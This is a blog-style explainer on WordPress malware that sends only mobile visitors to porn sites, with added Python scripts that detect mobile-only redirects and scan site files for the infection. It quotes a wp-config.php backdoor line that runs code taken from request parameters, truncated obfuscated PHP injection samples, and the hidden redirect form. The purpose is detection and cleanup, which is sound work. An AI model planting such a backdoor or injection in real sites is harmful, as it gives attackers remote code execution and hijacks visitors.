How about a malware infection on your WordPress website that gives no hint to visitors on desktop browsers, but redirects them to an adult or porn website when they view the site on a mobile device such as an iPhone, an Android phone or Opera Mobile?

Recently there have been many reports of websites facing an issue that is very hard to detect, even with scanners like Sucuri: the malware is detected on the first scan, and on the second scan nothing is found. The malware's strategy of going clean for a while after the first visit is meant to deceive mobile users into believing they typed the wrong URL. For returning mobile visitors the site serves no redirect for a few hours, and then the user is redirected to the adult sites again.

Desktop browsers, on the other hand, show no symptom of the redirection at all, which makes the issue very difficult to trace.
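As an added example (not code from the original post), here is a small Python check for the mobile-only behaviour described above: it fetches a page once with a desktop User-Agent and once with a mobile one, without following redirects, and reports redirect targets that appear only in the mobile response, whether they come from a 30x Location header, a meta refresh, a JavaScript location change, or a hidden form the page submits itself (the kind of injected form shown further down). The responses used in demo() are constructed, and the redirect.example host name is a placeholder.

```python
"""Added example (not code from the original post): detect a redirect served only
to mobile browsers by comparing a desktop and a mobile fetch of the same URL."""
import re
import urllib.error
import urllib.request
from dataclasses import dataclass

DESKTOP_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0 Safari/537.36")
MOBILE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 "
             "(KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1")


@dataclass
class Response:
    status: int
    headers: dict
    body: str


# Ways a page can move the visitor elsewhere without a click
_META_REFRESH = re.compile(r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*url=([^"\'>\s]+)', re.I)
_JS_LOCATION = re.compile(r'location(?:\.href\s*=|\s*=|\.(?:replace|assign)\()\s*["\']([^"\']+)', re.I)
_FORM_ACTION = re.compile(r'<form[^>]+action=["\']([^"\']+)["\'][^>]*>', re.I)
_FORM_SUBMIT = re.compile(r'\.submit\(\)', re.I)


def find_redirects(resp):
    """List of (kind, destination) pairs found in one response."""
    found = []
    if 300 <= resp.status < 400:
        headers = {k.lower(): v for k, v in resp.headers.items()}
        if "location" in headers:
            found.append(("http-redirect", headers["location"]))
    for m in _META_REFRESH.finditer(resp.body):
        found.append(("meta-refresh", m.group(1)))
    for m in _JS_LOCATION.finditer(resp.body):
        found.append(("js-location", m.group(1)))
    # A form the page submits by itself, like the hidden POST form in the post
    if _FORM_SUBMIT.search(resp.body):
        for m in _FORM_ACTION.finditer(resp.body):
            found.append(("auto-submit-form", m.group(1)))
    return found


def mobile_only_redirects(desktop, mobile):
    """Redirect targets present for the mobile User-Agent but absent for the desktop one."""
    return sorted(set(find_redirects(mobile)) - set(find_redirects(desktop)))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow: the 30x answer itself is the evidence


def fetch(url, user_agent, timeout=10):
    """Fetch url with the given User-Agent without following redirects (needs network)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as r:
            return Response(r.status, dict(r.headers), r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:  # raised for 30x because we refuse to follow
        return Response(e.code, dict(e.headers), e.read().decode("utf-8", "replace"))


def check_site(url):
    """Live check: fetch as desktop and as mobile, return mobile-only redirect targets."""
    return mobile_only_redirects(fetch(url, DESKTOP_UA), fetch(url, MOBILE_UA))


# Constructed sample responses; redirect.example is a placeholder host
CLEAN_HTML = "<html><body><h1>Welcome</h1></body></html>"
INJECTED_HTML = (
    "<html><body><h1>Welcome</h1>"
    '<form method="POST" action="http://redirect.example/landing.php?q=abc" id="re_form" target="_top">'
    '<input type="hidden" name="x" value="1"></form>'
    '<script>document.getElementById("re_form").submit();</script>'
    "</body></html>"
)


def demo():
    """Offline run over the constructed responses."""
    desktop = Response(200, {"Content-Type": "text/html"}, CLEAN_HTML)
    mobile = Response(200, {"Content-Type": "text/html"}, INJECTED_HTML)
    return mobile_only_redirects(desktop, mobile)


if __name__ == "__main__":
    print(demo())
```

For a live site, call check_site("https://your-site.example/") from a machine that has not visited the site before; the post notes the malware goes quiet for returning visitors, so a second request from the same address may come back clean.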

What does it look like?

There is malicious code inserted at the top of files including:
index.php
wp-config.php
functions.php
There are also other files created with a dot-dot (..) name.

What is injected?

This line is found added to the wp-config.php file.

if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['dsdssdsdsdsdsdsdsdsdsd']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslasshes($_REQUEST['HOST']));}

A large block of obfuscated text can be found at the top of one or many PHP files in your WordPress installation; this is what makes the WordPress site redirect to porn sites.


< ? php funct.. dpw0ssVt9TUW7g($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_repla(..$f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uhaasdf function xaQ7AXovsa2Ls1kO67aZeDSo($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_replace($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh} function WGts9IveXw3hD2j8Ub4yc($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh){return str_replace($f8QrZ16WY6L3Ati2VypMQHx9G,$Bte0ydYeuO5qAUncOOvW,$SkWT1uh) } $fEKSddqgAb1AHM96Tf = 'bdSy1ZBXjadSy1ZBXjsdSy1ZBXjedSy1ZBXj6dSy1ZBXj4dSy1ZBXj_dSy1ZBXjddSy1ZBXjedSy1ZBXjcdSy1ZBXjodSy1ZBXjddSy1ZBXje'; $fEKSddqgAb1AHM96Tf = WGts9IveXw3hD2j8Ub4yc('dSy1ZBXj','',$fEKSddqgAb1AHM96Tf); $TW4rFzlZF2JDF3nQNUaI = 'cc7UGBvoEyELYGCpdeoaYth9rc7UGBvoEyELYGCpdeoaYth9ec7UGBvoEyELYGCpdeoaYth9ac7UGBvoEyELYGCpdeoaYth9tc7UGBvoEyELYGCpdeoaYth9ec7UGBvoEyELYGCpdeoaYth9_c7UGBvoEyELYGCpdeoaYth9fc7UGBvoEyELYGCpdeoaYth9uc7UGBvoEyELYGCpdeoaYth9nc7UGBvoEyELYGCpdeoaYth9cc7UGBvoEyELYGCpdeoaYth9tc7UGBvoEyELYGCpdeoaYth9ic7UGBvoEyELYGCpdeoaYth9oc7UGBvoEyELYGCpd..

Another piece of code that is inserted at the top of the PHP files:


< ? .php .funct.jkn LEGH7Gab($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p){return str_replace($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p);} function wCdmruP5.KZprgpQfPuf9HOydy($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61y.uevHHJ1pjketurn str_replace($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61y.uevHH:Jjk);} function yjkyGTcgfgx($vvxn6nCotS4,$LpFwWkU0Jlad,$zboIc61yuevHHJ1p){return str_repjkQqZ9P = 'bHiQSRAoa3JIftkaHiQSRAoa3jkftjkiQSRAoa3JIftkeHiQSRAoa3JIftkcHiQSRAoa3JIftkoHiQSRAoa3JIftkdHiQSRAoa3JIftke'; $IrlAQbZXmtTQqZ9P = ymIyGTcgfgx('HiQ.SRAoa3JIftk','jkjlAQbZXmtTQqZ9P); $LJYPiGE1oHRwfZrCjZCUhcl0h = 'cowdrx3eKmYqDOqjtQrowdrx3eKmYqDOqjtQeowdrx3eKmYqDOqjtQaowdrx3eKmYqDOqjtQtowdrx3eKmY.qDOqjtQeowdrx3jkdrx3eKmYqDOqjtQcowdrx3eKmYqDOqjtQtowdrx3eKmYqDOqjtQiowdr:x3eKmYqDOqjtQoowdrx3eKmYqDOqjtQn'; $LJYPiGE1oHRwfZrCjhZCUhcl0h = ymIyGTcgfgx('owdrx3eKmYqDOqjtQ','',$LJYPiGE1oHRwfZrCjZCUhcl0h); $CUUZoRydx = 'az9ANeaz9ANvaz9ANaaz9ANl'; $CUUZoRydx = ymIyGTcgfgx('az9Akj'',

What it puts on the page is something like this (which the user does not see):

<form method="POST" action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725.." id="re foto_form" target="_top">

Cleaning this malware can be very tricky on large websites with many files, because the code may be inserted into many .php files. If your website shows any symptom of redirecting to another URL and you assume it was just a typo while entering the URL, check the major files: index.php and functions.php in the theme directory, and the wp-config.php file in the root of the WordPress installation.
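As an added example that is not part of the original post, the following Python script performs the file check described above over a WordPress tree: it reads the top of every .php file and flags a request parameter called as a function (the shape of the wp-config.php line shown earlier), dangerous calls such as create_function or base64_decode, and padded string literals of the kind seen in the obfuscated blocks, which it unpads to show the function name they spell; it also flags file names that start with two dots. The site tree built by build_sample_site() is a constructed fixture; the backdoor line and the two padded literals inside it are copied from the samples on this page, and the function name W is a stand-in for the random names the malware uses.

```python
"""Added example (not code from the original post): read-only scan of a WordPress
tree for the indicators the post describes. The sample site is a constructed fixture."""
import os
import re
import tempfile
from collections import Counter

HEAD_BYTES = 4096  # the post says the injections sit at the top of the file

# Request input used directly as a callable, e.g. $_REQUEST['x'](...)
REQUEST_CALLABLE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\[[^\]]+\]\s*\(")
# Sinks a config or theme file has no business calling at its top
SINKS = re.compile(r"\b(create_function|eval|base64_decode|gzinflate|str_rot13)\s*\(")
# Single-quoted literals long enough to hide a padded function name
STRING_LITERAL = re.compile(r"'([^'\\]{20,})'")
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def junk_token(s, n=4, min_repeats=4):
    """Padding token of a string built as <char><junk><char><junk>...; None if nothing repeats."""
    grams = Counter(s[i:i + n] for i in range(len(s) - n + 1))
    if not grams:
        return None
    gram, count = grams.most_common(1)[0]
    if count < min_repeats:
        return None
    starts = [m.start() for m in re.finditer(re.escape(gram), s)]
    lo, hi = 0, n
    # Widen the fragment while every occurrence agrees on the neighbouring character
    while all(p + hi < len(s) for p in starts) and len({s[p + hi] for p in starts}) == 1:
        hi += 1
    while all(p + lo > 0 for p in starts) and len({s[p + lo - 1] for p in starts}) == 1:
        lo -= 1
    return s[starts[0] + lo:starts[0] + hi]


def unpad(literal):
    """Hidden identifier of a padded literal, or None when the literal is not an exact interleave."""
    tok = junk_token(literal)
    if tok is None or len(tok) < 3:
        return None
    revealed = literal.replace(tok, "")
    if len(revealed) < 4 or not IDENT.fullmatch(revealed):
        return None
    core = literal[len(tok):] if literal.startswith(tok) else literal
    core = core[:-len(tok)] if core.endswith(tok) else core
    return revealed if tok.join(revealed) == core else None  # round-trip check


def scan_file(path):
    """Indicator descriptions for one file (empty list if clean)."""
    findings = []
    name = os.path.basename(path)
    if name.startswith(".."):
        findings.append("dot-dot file name")
    if not name.endswith(".php"):
        return findings
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES).decode("utf-8", "replace")
    if REQUEST_CALLABLE.search(head):
        findings.append("request parameter called as a function")
    for m in SINKS.finditer(head):
        findings.append("dangerous call near top of file: " + m.group(1))
    for m in STRING_LITERAL.finditer(head):
        hidden = unpad(m.group(1))
        if hidden:
            findings.append("padded string literal hides '" + hidden + "'")
    return findings


def scan_tree(root):
    """Relative path -> findings, for every file with at least one indicator."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            full = os.path.join(dirpath, f)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


# Constructed fixture: backdoor line and padded literals copied from the samples on this page
BACKDOOR = ("if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['dsdssdsdsdsdsdsdsdsdsd']"
            "('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslasshes($_REQUEST['HOST']));}")
PADDED = ("function W($a,$b,$c){return str_replace($a,$b,$c);} "
          "$x = 'bdSy1ZBXjadSy1ZBXjsdSy1ZBXjedSy1ZBXj6dSy1ZBXj4dSy1ZBXj_dSy1ZBXjddSy1ZBXj"
          "edSy1ZBXjcdSy1ZBXjodSy1ZBXjddSy1ZBXje'; $x = W('dSy1ZBXj','',$x); "
          "$y = 'az9ANeaz9ANvaz9ANaaz9ANl'; $y = W('az9AN','',$y);")


def build_sample_site():
    root = tempfile.mkdtemp(prefix="wp-scan-")
    files = {
        "wp-config.php": "<?php\n" + BACKDOOR + "\ndefine('DB_NAME', 'wordpress');\n",
        "index.php": "<?php " + PADDED + "\nrequire 'wp-blog-header.php';\n",
        "wp-content/themes/demo/functions.php": "<?php\nadd_action('init', 'demo_init');\nfunction demo_init() {}\n",
        "wp-content/uploads/..index.php": "<?php echo 'placeholder';\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


def demo():
    report = scan_tree(build_sample_site())
    for path, hits in sorted(report.items()):
        print(path, "->", "; ".join(hits))
    return report


if __name__ == "__main__":
    demo()
```

Run scan_tree() over a copy of the site rather than the live tree, and treat each hit as a lead to inspect by hand; the unpad step is exact (it rebuilds the literal from the recovered name), but the sink list is a heuristic and ordinary plugin code can occasionally trip it.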
